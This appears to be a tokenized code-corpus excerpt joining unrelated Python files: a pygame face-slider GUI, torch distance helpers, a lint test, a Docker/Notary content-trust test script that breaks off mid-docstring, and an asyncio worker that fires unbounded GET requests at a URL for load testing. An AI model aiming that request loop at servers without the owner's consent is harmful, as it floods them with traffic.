button[0])<block_end><if_stmt>transitionTimes[0]<ge>0<block_start>w=290<times>(frameTimer-transitionTimes[0])/(transitionTimes[1]-transitionTimes[0])<line_sep>progress_bar_surface=pygame.surface.Surface((w 25))<line_sep>progress_bar_surface.fill((0 150 0))<line_sep>screen.blit(progress_bar_surface (805 125))<block_end>image_surface=pygame.surfarray.make_surface(calculatedImage)<line_sep>bigger=pygame.transform.scale(image_surface (500 500))<line_sep>screen.blit(bigger (300 0))<if_stmt>misspelledTimer<ge>1<block_start>y=5<if_stmt>misspelledTimer<l>60<block_start>y=-115+120<times>(0.5+math.cos((misspelledTimer-60)/60.0<times>math.pi)<times>0.5)<block_end>screen.blit(oops_image (805 y))<block_end><block_end># return misspelledTimer. how many frames the misspelled warning should show up. I know, it's weird and dumb.
<def_stmt>go_to_celeb c<block_start>celeb_choice=string_to_celeb(enteredName)<if_stmt>c<ge>0<block_start>celeb_choice=c<block_end><if_stmt>celeb_choice<eq>-1<block_start><return>800<block_end><else_stmt><block_start>slider_settings=celebSliders[celeb_choice]<if_stmt>approach_settings[1]<eq>1<block_start><for_stmt>i range(DENSE_SIZE)<block_start>settings[i]<augadd>slider_settings[i]-settings[i]<times>approach_settings[0]<block_end><block_end><else_stmt><block_start>transitionKeyFrames[0]=settings.copy()<line_sep>transitionKeyFrames[1]=settings.copy()<for_stmt>i range(DENSE_SIZE)<block_start>transitionKeyFrames[1 i]<augadd>slider_settings[i]-settings[i]<times>approach_settings[0]<block_end>transitionTimes[0]=frameTimer-1<line_sep>transitionTimes[1]=frameTimer-1+100<times>(1-approach_settings[1])# really bad magic numbers oh well
<block_end><block_end><return>0<block_end>pygame.init()<line_sep>slides=[]<for_stmt>i range(VISIBLE_COMPONENTS)<block_start>eigen="%.4f"%eigenvalues[i]<line_sep>slides.append(Slider(i 3 -3 (i%2)<times>150 (i<floordiv>2)<times>48+60 150 48))<block_end>approachSlides=[]<for_stmt>i range(2)<block_start>approachSlides.append(ApproachSlider(i 1 0 800 240+60<times>i 300 60))<block_end>screen=pygame.display.set_mode((1100 600))<line_sep>running=<true><line_sep># OPTIONAL SPECIAL CHILD CREATION
# create_special_children(0,1,"speshCaryD")
# for i in range(0,2):
# create_special_children(i,2,"speshTwo")
# create_child_grid(0,6,"speshGrid")
# create_family_tree(0,12,"speshFamilyHuge")
# END OF OPTIONAL SPECIAL CHILD CREATION
<while_stmt>running<block_start>shouldICalculateImage=<false><line_sep>frameTimer<augadd>1<line_sep>misspelledTimer=max(0 misspelledTimer-1)<for_stmt>event pygame.event.get()# Check for KEYDOWN event; KEYDOWN is a constant defined in pygame.locals, which we imported earlier
<block_start><if_stmt>event.type<eq>KEYDOWN# If the Esc key has been pressed set running to false to exit the main loop
<block_start><if_stmt>event.key<eq>K_LSHIFT<or>event.key<eq>K_RSHIFT<block_start>isShiftPressed=<true><block_end><elif_stmt>event.key<eq>K_ESCAPE<block_start>running=<false><block_end><elif_stmt>enteringName<block_start>k=event.key<line_sep>isLetter=ord('a')<le>k<le>ord('z')<if_stmt>isLetter<or>k<eq>ord('-')<or>k<eq>ord(' ')<or>k<eq>ord('\'')<block_start>ch=event.unicode<if_stmt>isShiftPressed<and>isLetter<block_start>ch=ch.upper()<block_end>enteredName=enteredName+ch<block_end><if_stmt>len(enteredName)<ge>1<and>(k<eq>K_BACKSPACE<or>k<eq>K_DELETE)<block_start>enteredName=enteredName[0:-1]<block_end><if_stmt>k<eq>K_RETURN<block_start>enteringName=<false><line_sep>misspelledTimer=go_to_celeb(-1)<line_sep>shouldICalculateImage=<true><block_end><block_end><block_end># Check for QUIT event; if QUIT, set running to false
<elif_stmt>event.type<eq>KEYUP<block_start><if_stmt>event.key<eq>K_LSHIFT<or>event.key<eq>K_RSHIFT<block_start>isShiftPressed=<false><block_end><block_end><elif_stmt>event.type<eq>QUIT<block_start>running=<false><block_end><elif_stmt>event.type<eq>pygame.MOUSEBUTTONDOWN<block_start>mouse_loc=pygame.mouse.get_pos()<if_stmt>event.button<eq>4<or>event.button<eq>5<block_start>dire=(event.button-4.5)<times>2<if_stmt>mouse_loc[0]<l>300<and>60<le>mouse_loc[1]<l>540<block_start>i=(mouse_loc[0]<floordiv>150)+((mouse_loc[1]-60)<floordiv>48)<times>2+scrollPosition<line_sep>settings[i]<augsub>0.2<times>dire<line_sep>shouldICalculateImage=<true><block_end><else_stmt><block_start>scrollPosition=min(max(scrollPosition+2<times>int(dire) 0) denseData.shape[1]-VISIBLE_COMPONENTS)<for_stmt>i range(VISIBLE_COMPONENTS)<block_start>slides[i].val=settings[i+scrollPosition]<block_end><block_end><block_end><else_stmt><block_start>enteringName=<false><if_stmt>mouse_loc[0]<l>300<block_start><if_stmt>mouse_loc[1]<l>60<block_start><for_stmt>i range(DENSE_SIZE)<block_start>settings[i]=np.random.normal(0 1 1)<block_end>shouldICalculateImage=<true><line_sep>enteredName=""<block_end><elif_stmt>mouse_loc[1]<ge>540<block_start><for_stmt>i range(DENSE_SIZE)<block_start>settings[i]=0<block_end>shouldICalculateImage=<true><line_sep>enteredName=""<block_end><else_stmt><block_start>i=(mouse_loc[0]<floordiv>150)+((mouse_loc[1]-60)<floordiv>48)<times>2<line_sep>slides[i].hit=<true><block_end><block_end><elif_stmt>mouse_loc[0]<ge>800<block_start><if_stmt>mouse_loc[1]<l>120<block_start><for_stmt>i range(DENSE_SIZE)<block_start>settings[i]<augmul>-1<block_end>shouldICalculateImage=<true><line_sep>misspelledTimer=0<line_sep>enteredName=""<block_end><elif_stmt>mouse_loc[1]<l>240<block_start>enteringName=<true><line_sep>misspelledTimer=0<line_sep>enteredName=""<block_end><elif_stmt>240<le>mouse_loc[1]<l>360<block_start>i=((mouse_loc[1]-240)<floordiv>60)<line_sep>approachSlides[i].hit=<true><block_end><elif_stmt>mouse_loc[1]<ge>480<block_start>c=np.random.randint(denseData.shape[0])<line_sep>go_to_celeb(c)<line_sep>shouldICalculateImage=<true><line_sep>enteredName=allPeople[c].split(",")[0]<block_end><elif_stmt>mouse_loc[1]<ge>360<block_start>misspelledTimer=go_to_celeb(-1)<line_sep>shouldICalculateImage=<true><block_end><block_end><block_end><block_end><elif_stmt>event.type<eq>pygame.MOUSEBUTTONUP<block_start><for_stmt>s slides<block_start>s.hit=<false><block_end><for_stmt>a_s approachSlides<block_start>a_s.hit=<false><block_end><block_end><block_end><if_stmt>transitionTimes[0]<ge>0<block_start>proportion_through=min(max((frameTimer-transitionTimes[0])/(transitionTimes[1]-transitionTimes[0]) 0) 1)<if_stmt>frameTimer<ge>transitionTimes[1]<block_start>proportion_through=1<line_sep>transitionTimes[:]=-1<block_end>settings=transitionKeyFrames[0]+proportion_through<times>(transitionKeyFrames[1]-transitionKeyFrames[0])<line_sep>shouldICalculateImage=<true><block_end><else_stmt><block_start><for_stmt>s slides<block_start><if_stmt>s.hit<block_start>s.move()<line_sep>shouldICalculateImage=<true><block_end><block_end><block_end><for_stmt>a_s approachSlides<block_start><if_stmt>a_s.hit<block_start>a_s.move()<block_end><block_end><if_stmt>shouldICalculateImage<block_start>calculatedImage,nearestPerson=calculate_image(settings)<block_end>screen.fill(BLACK)<for_stmt>s slides<block_start>s.draw()<block_end><for_stmt>a_s approachSlides<block_start>a_s.draw()<block_end>draw_buttons()<line_sep>pygame.display.flip()<block_end>
|
''' Setup example scripts run (even without simple_rl fully installed).'''<import_stmt>os<import_stmt>sys<line_sep>parent_dir=os.path.abspath(os.path.join(os.getcwd() os.pardir))<line_sep>sys.path.insert(0 parent_dir)<line_sep>
|
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.functional<as>F<line_sep>p1=torch.nn.PairwiseDistance(p=1)<line_sep>p2=torch.nn.PairwiseDistance(p=2)<def_stmt>l1_score vec1 vec2<block_start><return>p1(vec1 vec2)<block_end><def_stmt>l2_score vec1 vec2<block_start><return>p2(vec1 vec2)<block_end><def_stmt>cos_score vec1 vec2<block_start><return>F.cosine_similarity(vec1 vec2)<block_end>
|
<import_stmt>asyncio<import_stmt>aiohttp<import_stmt>asyncio_redis<import_from_stmt>config LOG_INTERVAL REQ_KEY KILL_KEY<class_stmt>Child(object)<block_start>"""
wrapping all the child process feature in this class
"""<def_stmt>__init__ self id url<block_start>self.id=id+"-"+REQ_KEY<line_sep># print(self.id)
# self.connection = redis.Connection()
self.url=url<line_sep>self.loop=asyncio.get_event_loop()<line_sep>self.client=aiohttp.ClientSession(loop=self.loop)<line_sep>self.count=0<block_end># total request/s
<async_keyword><def_stmt>init self<block_start>self.redis_connection=<await>asyncio_redis.Pool.create(poolsize=2)<block_end><async_keyword><def_stmt>hammer self<block_start><while_stmt><true><block_start>connection=<await>self.client.get(self.url)<line_sep>self.count<augadd>1<line_sep><await>connection.release()<block_end><block_end><async_keyword><def_stmt>send_stats self<block_start><while_stmt><true><block_start><await>self.redis_connection.set(self.id str(self.count<floordiv>LOG_INTERVAL))<line_sep>self.count=0<line_sep><await>asyncio.sleep(LOG_INTERVAL)<block_end><block_end><def_stmt>clean_up self<block_start><pass><block_end><async_keyword><def_stmt>listen_for_close self<block_start>subscriber=<await>self.redis_connection.start_subscribe()<line_sep><await>subscriber.subscribe([KILL_KEY])<line_sep>reply=<await>subscriber.next_published()<line_sep># above will block until something is published
self.clean_up()<block_end><def_stmt>start self *funcs<block_start>self.loop.run_until_complete(self.init())<line_sep>asyncio.ensure_future(self.send_stats())<line_sep>asyncio.ensure_future(self.hammer())<line_sep>asyncio.ensure_future(self.listen_for_close())<if_stmt>funcs<block_start><for_stmt>func funcs<block_start>asyncio.ensure_future(func)<block_end><block_end>self.loop.run_forever()<block_end><block_end>
|
<import_stmt>pytest<import_from_stmt>wemake_python_styleguide.violations.consistency BadNumberSuffixViolation WrongHexNumberCaseViolation <import_from_stmt>wemake_python_styleguide.visitors.tokenize.primitives WrongNumberTokenVisitor <line_sep>hex_number_templates=['0x{0}' '0xA{0}' '0x{0}2' '0xB{0}1' ]<line_sep>@pytest.mark.parametrize('hex_char' ['a' 'b' 'c' 'd' 'e' 'f'])@pytest.mark.parametrize('number' hex_number_templates)<def_stmt>test_hex_wrong_case parse_tokens assert_errors assert_error_text default_options hex_char number number_sign <block_start>"""Ensures that numbers with suffix not in lowercase raise a warning."""<line_sep>real_number=number.format(hex_char)<line_sep>file_tokens=parse_tokens(number_sign(real_number))<line_sep>visitor=WrongNumberTokenVisitor(default_options file_tokens=file_tokens)<line_sep>visitor.run()<line_sep>assert_errors(visitor [WrongHexNumberCaseViolation])<line_sep>assert_error_text(visitor real_number)<block_end>@pytest.mark.parametrize('hex_char' ['A' 'B' 'C' 'D' 'E' 'F'])@pytest.mark.parametrize('number' hex_number_templates)<def_stmt>test_hex_correct_case parse_tokens assert_errors default_options hex_char number number_sign <block_start>"""Ensures that numbers with correct numbers do not raise a warning."""<line_sep>file_tokens=parse_tokens(number_sign(number.format(hex_char)))<line_sep>visitor=WrongNumberTokenVisitor(default_options file_tokens=file_tokens)<line_sep>visitor.run()<line_sep>assert_errors(visitor [])<block_end>@pytest.mark.parametrize('hex_char' ['a' 'b' 'c' 'd' 'e' 'f'])@pytest.mark.parametrize('number' hex_number_templates)<def_stmt>test_hex_double_wrong_case parse_tokens assert_errors default_options hex_char number number_sign <block_start>"""Ensures that numbers with suffix not in lowercase raise a warning."""<line_sep>real_number=number.format(hex_char).replace('x' 'X')<line_sep>file_tokens=parse_tokens(number_sign(real_number))<line_sep>visitor=WrongNumberTokenVisitor(default_options file_tokens=file_tokens)<line_sep>visitor.run()<line_sep>assert_errors(visitor [BadNumberSuffixViolation WrongHexNumberCaseViolation ])<block_end>
|
"""
Script that automates trusted pull/pushes on different docker versions.
Usage: python buildscripts/dockertest.py
- assumes that this is run from the root notary directory
- assumes that bin/client already exists
- assumes you are logged in with docker
- environment variables to provide:
- DEBUG=true - produce debug output
- DOCKER_CONTENT_TRUST_SERVER=<notary server url> test against a non-local
notary server
- NOTARY_SERVER_USERNAME=<username> login creds username to notary server
- NOTARY_SERVER_PASSPHRASE=<passwd> login creds password to notary server
- DOCKER_USERNAME=<username> docker hub login username
"""<import_from_future_stmt> print_function<import_from_stmt>collections OrderedDict<import_stmt>atexit<import_stmt>json<import_stmt>os<import_stmt>platform<import_stmt>pwd<import_stmt>re<import_stmt>shutil<import_stmt>subprocess<import_stmt>tarfile<import_from_stmt>tempfile mkdtemp<import_from_stmt>time sleep time<import_stmt>urllib<import_from_stmt>urlparse urljoin<line_sep># Configuration for testing
# please give the full path to the binary (or if it's on your path, just the
# binary name) for these if you do not want them downloaded, otherwise these
# can be ignored. Up to you to make sure you are running the correct daemon
# version.
DOCKERS={}<line_sep># delete any of these if you want to specify the docker binaries yourself
DOWNLOAD_DOCKERS={"1.10":("https://get.docker.com" "docker-1.10.3") "1.11":("https://get.docker.com" "docker-1.11.2") "1.12":("https://get.docker.com" "docker-1.12.1") }<line_sep>NOTARY_VERSION="0.4.1"# only version that will work with docker < 1.13
NOTARY_BINARY="bin/notary"<line_sep># please replace with private registry if you want to test against a private
# registry
REGISTRY="docker.io"<line_sep># please enter your username if it does not match your shell username, or set the
# environment variable DOCKER_USERNAME
REGISTRY_USERNAME=os.getenv("DOCKER_USERNAME" pwd.getpwuid(os.getuid())[0])<line_sep># what you want the testing repo names to be prefixed with
REPO_PREFIX="docker_test"<line_sep># Assumes default docker config dir
DEFAULT_DOCKER_CONFIG=os.path.expanduser("~/.docker")<line_sep># Assumes the trust server will be run using compose if
# DOCKER_CONTENT_TRUST_SERVER is not specified
DEFAULT_NOTARY_SERVER="https://notary-server:4443"<line_sep># please enter a custom trust server location if you do not wish to use a local
# docker-compose instantiation. If testing against Docker Hub's notary server
# or another trust server, please also ensure that this script does not pick up
# incorrect TLS certificates from ~/.notary/config.json by default
TRUST_SERVER=os.getenv('DOCKER_CONTENT_TRUST_SERVER' DEFAULT_NOTARY_SERVER)<line_sep># Assumes the test will be run with `python misc/dockertest.py` from
# the root of the notary repo after binaries are built
# also overrides the notary server location if need be
<if_stmt>TRUST_SERVER<ne>DEFAULT_NOTARY_SERVER<block_start>NOTARY_CLIENT="{client} -s {server}".format(client=NOTARY_BINARY server=TRUST_SERVER)<block_end><else_stmt><block_start>NOTARY_CLIENT="{client} -c cmd/notary/config.json".format(client=NOTARY_BINARY)<block_end>DEBUG=" -D"<if>os.getenv('DEBUG')<else>""<line_sep># ---- setup ----
<def_stmt>download_docker download_dir="/tmp"<block_start>"""
Downloads the relevant docker binaries and sets the docker values
"""<line_sep>system=platform.system()<line_sep>architecture="x86_64"<if_stmt>platform.architecture()[0]<ne>"64bit"<block_start>architecture="i386"<block_end>downloadfile=urllib.URLopener()<for_stmt>version DOWNLOAD_DOCKERS<block_start>domain,binary=DOWNLOAD_DOCKERS[version]<line_sep>tarfilename=os.path.join(download_dir binary+".tgz")<line_sep>extractdir=os.path.join(download_dir binary)<line_sep>DOCKERS[version]=os.path.join(extractdir "docker")<line_sep># we already have that version
<if_stmt>os.path.isfile(os.path.join(extractdir "docker"))<block_start><continue><block_end><if_stmt><not>os.path.isdir(extractdir)<block_start>os.makedirs(extractdir)<block_end><if_stmt><not>os.path.isfile(tarfilename)<block_start>url=urljoin(# as of 1.10 docker downloads are tar-ed due to potentially
# containing containerd etc.
# note that for windows (which we don't currently support),
# it's a .zip file
domain "/".join(["builds" system architecture binary+".tgz"]))<line_sep>print("Downloading" url)<line_sep>downloadfile.retrieve(url tarfilename)<block_end><with_stmt>tarfile.open(tarfilename 'r:gz')<as>tf<block_start><for_stmt>member tf.getmembers()<block_start><if_stmt><not>member.isfile()<block_start><continue><block_end>archfile=tf.extractfile(member)<line_sep>fname=os.path.join(extractdir os.path.basename(member.name))<with_stmt>open(fname 'wb')<as>writefile<block_start>writefile.write(archfile.read())<block_end>os.chmod(fname 0755)<block_end><block_end><if_stmt><not>os.path.isfile(DOCKERS[version])<block_start><raise>Exception("Extracted {tar} to {loc} but could not find {docker}".format(tar=tarfilename loc=extractdir docker=DOCKERS[version]))<block_end><block_end><block_end><def_stmt>verify_notary <block_start>"""
Check that notary is the right version
"""<if_stmt><not>os.path.isfile(NOTARY_BINARY)<block_start><raise>Exception("notary client does not exist: "+NOTARY_BINARY)<block_end>output=subprocess.check_output([NOTARY_BINARY "version"]).strip()<line_sep>lines=output.split("\n")<if_stmt>len(lines)<ne>3<block_start>print(output)<line_sep><raise>Exception("notary version output invalid")<block_end><if_stmt>lines[1].split()[-1]<g>NOTARY_VERSION<block_start>print(output)<line_sep><raise>Exception("notary version too high: must be <= "+NOTARY_VERSION)<block_end><block_end><def_stmt>setup <block_start>"""
Ensure we are set up to run the test
"""<line_sep>download_docker()<line_sep>verify_notary()<line_sep># ensure that we have the alpine image
subprocess.call("docker pull alpine".split())<line_sep># copy the docker config dir over so we don't break anything in real docker
# config directory
os.mkdir(_TEMP_DOCKER_CONFIG_DIR)<line_sep># copy any docker creds over so we can push
configfile=os.path.join(_TEMP_DOCKER_CONFIG_DIR "config.json")<line_sep>shutil.copyfile(os.path.join(DEFAULT_DOCKER_CONFIG "config.json") configfile)<line_sep># always clean up the config file so creds aren't left in this temp directory
atexit.register(os.remove configfile)<line_sep>defaulttlsdir=os.path.join(DEFAULT_DOCKER_CONFIG "tls")<line_sep>tlsdir=os.path.join(_TEMP_DOCKER_CONFIG_DIR "tls")<if_stmt>os.path.exists(tlsdir)<block_start>shutil.copytree(defaulttlsdir tlsdir)<block_end># make sure that the cert is in the right place for local notary
<if_stmt>TRUST_SERVER<eq>DEFAULT_NOTARY_SERVER<block_start>tlsdir=os.path.join(tlsdir "notary-server:4443")<if_stmt><not>os.path.isdir(tlsdir)<block_start><try_stmt><block_start>shutil.rmtree(tlsdir)# in case it's not a directory
<block_end><except_stmt>OSError<as>ex<block_start><if_stmt>"No such file or directory"<not><in>str(ex)<block_start><raise><block_end><block_end>os.makedirs(tlsdir)<block_end>cert=os.path.join(tlsdir "root-ca.crt")<if_stmt><not>os.path.isfile(cert)<block_start>shutil.copyfile("fixtures/root-ca.crt" cert)<block_end><block_end><block_end># ---- tests ----
_TEMPDIR=mkdtemp(prefix="docker-version-test")<line_sep>_TEMP_DOCKER_CONFIG_DIR=os.path.join(_TEMPDIR "docker-config-dir")<line_sep>_TRUST_DIR=os.path.join(_TEMP_DOCKER_CONFIG_DIR "trust")<line_sep>_ENV=os.environ.copy()<line_sep>_ENV.update({# enable content trust and use our own server
"DOCKER_CONTENT_TRUST_SERVER":TRUST_SERVER "DOCKER_CONTENT_TRUST":"1" # environment variables that notary uses
"NOTARY_ROOT_PASSPHRASE":"randompass" "NOTARY_TARGETS_PASSPHRASE":"randompass" "NOTARY_SNAPSHOT_PASSPHRASE":"randompass" # environment variables used by current version of docker
"DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE":"randompass" "DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE":"randompass" # environment variables used by docker 1.8
"DOCKER_CONTENT_TRUST_OFFLINE_PASSPHRASE":"randompass" "DOCKER_CONTENT_TRUST_TAGGING_PASSPHRASE":"randompass" # do not use the default docker config directory
"DOCKER_CONFIG":_TEMP_DOCKER_CONFIG_DIR})<line_sep>_DIGEST_REGEX=re.compile(r"\b[dD]igest: sha256:([0-9a-fA-F]+)\b")<line_sep>_SIZE_REGEX=re.compile(r"\bsize: ([0-9]+)\b")<line_sep>_PULL_A_REGEX=re.compile(r"Pull \(\d+ of \d+\): .+:(.+)@sha256:([0-9a-fA-F]+)")<line_sep>_BUILD_REGEX=re.compile(r"Successfully built ([0-9a-fA-F]+)")<def_stmt>clear_tuf <block_start>"""
Removes the trusted certificates and TUF metadata in ~/.docker/trust
"""<try_stmt><block_start>shutil.rmtree(os.path.join(_TRUST_DIR "trusted_certificates"))<line_sep>shutil.rmtree(os.path.join(_TRUST_DIR "tuf"))<block_end><except_stmt>OSError<as>ex<block_start><if_stmt>"No such file or directory"<not><in>str(ex)<block_start><raise><block_end><block_end><block_end><def_stmt>clear_keys <block_start>"""
Removes the TUF keys in trust directory, since the key format changed
between versions and can cause problems if testing newer docker versions
before testing older docker versions.
"""<try_stmt><block_start>shutil.rmtree(os.path.join(_TRUST_DIR "private"))<block_end><except_stmt>OSError<as>ex<block_start><if_stmt>"No such file or directory"<not><in>str(ex)<block_start><raise><block_end><block_end><block_end><def_stmt>run_cmd cmd fileoutput input=<none><block_start>"""
Takes a string command, runs it, and returns the output even if it fails.
"""<line_sep>print("$ "+cmd)<line_sep>fileoutput.write("$ {cmd}\n".format(cmd=cmd))<if_stmt>input<is><not><none><block_start>process=subprocess.Popen(cmd.split() env=_ENV stderr=subprocess.STDOUT stdin=subprocess.PIPE stdout=subprocess.PIPE)<line_sep>process.stdin.write(input)<line_sep>process.stdin.close()<block_end><else_stmt><block_start>process=subprocess.Popen(cmd.split() env=_ENV stderr=subprocess.STDOUT stdout=subprocess.PIPE)<block_end>output=""<while_stmt>process.poll()<is><none><block_start>line=process.stdout.readline()<line_sep>print(line.strip("\n"))<line_sep>fileoutput.write(line)<if_stmt>"level=debug"<not><in>line<block_start>output<augadd>line<block_end><block_end>retcode=process.poll()<line_sep>print()<line_sep>fileoutput.write("\n")<if_stmt>retcode<block_start><raise>subprocess.CalledProcessError(retcode cmd output=output)<block_end><return>output<block_end><def_stmt>rmi fout docker_version image tag<block_start>"""
Ensures that an image is no longer available locally to docker.
"""<try_stmt><block_start>run_cmd("{docker} rmi {image}:{tag}".format(docker=DOCKERS[docker_version] image=image tag=tag) fout)<block_end><except_stmt>subprocess.CalledProcessError<as>ex<block_start><if_stmt>"could not find image"<not><in>str(ex)<block_start><raise><block_end><block_end><block_end><def_stmt>assert_equality actual expected<block_start>"""
Assert equality, print nice message
"""<assert_stmt>actual<eq>expected "\nGot : {0}\nExpected: {1}".format(repr(actual) repr(expected))<block_end><def_stmt>pull fout docker_version image tag expected_sha<block_start>"""
Pulls an image using docker, and asserts that the sha is correct. Make
sure it is untagged first.
"""<line_sep>clear_tuf()<line_sep>rmi(fout docker_version image tag)<line_sep>output=run_cmd("{docker}{debug} pull {image}:{tag}".format(docker=DOCKERS[docker_version] image=image tag=tag debug=DEBUG) fout)<line_sep>sha=_DIGEST_REGEX.search(output).group(1)<line_sep>assert_equality(sha expected_sha)<block_end><def_stmt>push fout docker_version image tag<block_start>"""
Tags an image with the docker version and pushes it. Returns the sha and
expected size.
"""<line_sep>clear_tuf()<line_sep># tag image with the docker version
run_cmd("{docker} tag alpine {image}:{tag}".format(docker=DOCKERS[docker_version] image=image tag=tag) fout)<line_sep># push!
output=run_cmd("{docker}{debug} push {image}:{tag}".format(docker=DOCKERS[docker_version] image=image tag=tag debug=DEBUG) fout)<line_sep>sha=_DIGEST_REGEX.search(output).group(1)<line_sep>size=_SIZE_REGEX.search(output).group(1)<line_sep># sleep for 1s after pushing, just to let things propagate :)
sleep(1)<line_sep># list
targets=notary_list(fout image)<for_stmt>target targets<block_start><if_stmt>target[0]<eq>tag<block_start>assert_equality(target [tag sha size "targets"])<block_end><block_end><return>sha size<block_end><def_stmt>get_notary_usernamepass <block_start>"""
Gets the username password for the notary server
"""<line_sep>username=os.getenv("NOTARY_SERVER_USERNAME")<line_sep>passwd=os.getenv("NOTARY_SERVER_PASSPHRASE")<if_stmt>username<and>passwd<block_start><return>username+"\n"+passwd+"\n"<block_end><return><none><block_end><def_stmt>notary_list fout repo<block_start>"""
Calls notary list on the repo and returns a list of lists of tags, shas,
sizes, and roles.
"""<line_sep>clear_tuf()<line_sep>output=run_cmd("{notary}{debug} -d {trustdir} list {gun}".format(notary=NOTARY_CLIENT trustdir=_TRUST_DIR gun=repo debug=DEBUG) fout input=get_notary_usernamepass())<line_sep>lines=output.strip().split("\n")<assert_stmt>len(lines)<ge>3 "not enough targets"<line_sep><return>[line.strip().split()<for>line lines[2:]]<block_end><def_stmt>test_build fout image docker_version<block_start>"""
Build from a simple Dockerfile and ensure it works with DCT enabled
"""<line_sep>clear_tuf()<line_sep># build
# simple dockerfile to test building with trust
dockerfile="FROM {image}:{tag}\nRUN sh\n".format(image=image tag=docker_version)<line_sep>tempdir_dockerfile=os.path.join(_TEMPDIR "Dockerfile")<with_stmt>open(tempdir_dockerfile 'wb')<as>ftemp<block_start>ftemp.write(dockerfile)<block_end>output=run_cmd("{docker}{debug} build {context}".format(docker=DOCKERS[docker_version] context=_TEMPDIR debug=DEBUG) fout)<line_sep>build_result=_BUILD_REGEX.findall(output)<assert_stmt>len(build_result)<ge>0 "build did not succeed"<block_end><def_stmt>test_pull_a fout docker_version image expected_tags<block_start>"""
Pull -A on an image and ensure that all the expected tags are present
"""<line_sep>clear_tuf()<line_sep># remove every image possible
<for_stmt>tag expected_tags<block_start>rmi(fout docker_version image tag)<block_end># pull -a
output=run_cmd("{docker}{debug} pull -a {image}".format(docker=DOCKERS[docker_version] image=image debug=DEBUG) fout)<line_sep>pulled_tags=_PULL_A_REGEX.findall(output)<line_sep>assert_equality(len(pulled_tags) len(expected_tags))<for_stmt>tag,info expected_tags.iteritems()<block_start>found=[pulled<for>pulled pulled_tags<if>pulled[0]<eq>tag]<assert_stmt>found<line_sep>assert_equality(found[0][1] info["sha"])<block_end><block_end><def_stmt>test_push tempdir docker_version image tag="" allow_push_failure=<false> do_after_first_push=<none><block_start>"""
Tests a push of an image by pushing with this docker version, and asserting
that all the other docker versions can pull it.
"""<if_stmt><not>tag<block_start>tag=docker_version<block_end>filename=os.path.join(tempdir "{0}_{1}_push_{2}").format(time() docker_version tag)<with_stmt>open(filename 'wb')<as>fout<block_start><try_stmt><block_start>sha,size=push(fout docker_version image tag=tag)<block_end><except_stmt>subprocess.CalledProcessError<block_start><if_stmt>allow_push_failure<block_start><return>{"push":"failed, but that was expected"}<block_end><raise><block_end>return_val={"push":{"sha":sha "size":size}}<if_stmt>do_after_first_push<is><not><none><block_start>do_after_first_push(fout image)<block_end><for_stmt>ver DOCKERS<block_start><try_stmt><block_start>pull(fout ver image tag sha)<block_end><except_stmt>subprocess.CalledProcessError<block_start>print("pulling {0}:{1} with {2} (expected hash {3}) failed".format(image tag ver sha))<line_sep><raise><block_end><else_stmt><block_start>return_val["push"][ver]="pull succeeded"<block_end><block_end><return>return_val<block_end><block_end><def_stmt>test_run fout image docker_version<block_start>"""
Runs a simple alpine container to ensure it works with DCT enabled
"""<line_sep>clear_tuf()<line_sep># run
output=run_cmd("{docker}{debug} run -it --rm {image}:{tag} echo SUCCESS".format(docker=DOCKERS[docker_version] image=image tag=docker_version debug=DEBUG) fout)<assert_stmt>"SUCCESS"<in>output "run did not succeed"<block_end><def_stmt>test_docker_version docker_version repo_name="" do_after_first_push=<none><block_start>"""
Initialize a repo with one docker version. Test that all other docker
versions against that repo (both pulling and pushing).
"""<if_stmt><not>repo_name<block_start>repo_name="repo_by_{0}".format(docker_version)<block_end>tempdir=os.path.join(_TEMPDIR repo_name)<line_sep>os.makedirs(tempdir)<line_sep>image="{0}/{1}/{2}_{3}-{4}".format(REGISTRY REGISTRY_USERNAME REPO_PREFIX repo_name time())<line_sep>result=OrderedDict([(docker_version test_push(tempdir docker_version image do_after_first_push=do_after_first_push))])<line_sep># push again if we did something after the first push
<if_stmt>do_after_first_push<block_start>tag=docker_version+"_push_again"<line_sep>result[tag]=test_push(tempdir docker_version image tag=tag # 1.8.x and 1.9.x might fail to push again after snapshot rotation
# or delegation manipulation
allow_push_failure=re.compile(r"1\.[0-9](\.\d+)?$").search(docker_version))<block_end><for_stmt>ver DOCKERS<block_start><if_stmt>ver<ne>docker_version# 1.8.x and 1.9.x will fail to push if the repo was created by
# a more recent docker, since the key format has changed, or if a
# snapshot rotation or delegation has occurred
<block_start>can_fail=((do_after_first_push<or>re.compile(r"1\.[1-9][0-9](\.\d+)?$").search(docker_version))<and>re.compile(r"1\.[0-9](\.\d+)?$").search(ver))<line_sep>result[ver]=test_push(tempdir ver image allow_push_failure=can_fail)<block_end><block_end># find all the successfully pushed tags
expected_tags={}<for_stmt>ver result<block_start><if_stmt>isinstance(result[ver]["push"] dict)<block_start>expected_tags[ver]=result[ver]["push"]<block_end><block_end><with_stmt>open(os.path.join(tempdir "pull_a") 'wb')<as>fout<block_start><for_stmt>ver DOCKERS<block_start><try_stmt><block_start>test_pull_a(fout ver image expected_tags)<block_end><except_stmt>subprocess.CalledProcessError<block_start>result[ver]["pull-a"]="failed"<block_end><else_stmt><block_start>result[ver]["pull-a"]="success"<block_end><block_end><block_end><with_stmt>open(os.path.join(tempdir "notary_list") 'wb')<as>fout<block_start>targets=notary_list(fout image)<line_sep>assert_equality(len(targets) len(expected_tags))<for_stmt>tag,info expected_tags.iteritems()<block_start>found=[target<for>target targets<if>target[0]<eq>tag]<assert_stmt>found<line_sep>assert_equality(found[0][1:] [info["sha"] info["size"] "targets"])<block_end>result["list"]="listed expected targets successfully"<block_end><with_stmt>open(os.path.join(tempdir "build") 'wb')<as>fout<block_start><try_stmt><block_start>test_build(fout image docker_version)<block_end><except_stmt>subprocess.CalledProcessError<block_start>result[docker_version]["build"]="failed"<block_end><else_stmt><block_start>result[docker_version]["build"]="success"<block_end><block_end><with_stmt>open(os.path.join(tempdir "run") 'wb')<as>fout<block_start><try_stmt><block_start>test_run(fout image docker_version)<block_end><except_stmt>subprocess.CalledProcessError<block_start>result[docker_version]["run"]="failed"<block_end><else_stmt><block_start>result[docker_version]["run"]="success"<block_end><block_end><with_stmt>open(os.path.join(tempdir "result.json") 'wb')<as>fout<block_start>json.dump(result fout indent=2)<block_end><return>result<block_end><def_stmt>rotate_to_server_snapshot fout image<block_start>"""
Uses the notary client to rotate the snapshot key to be server-managed.
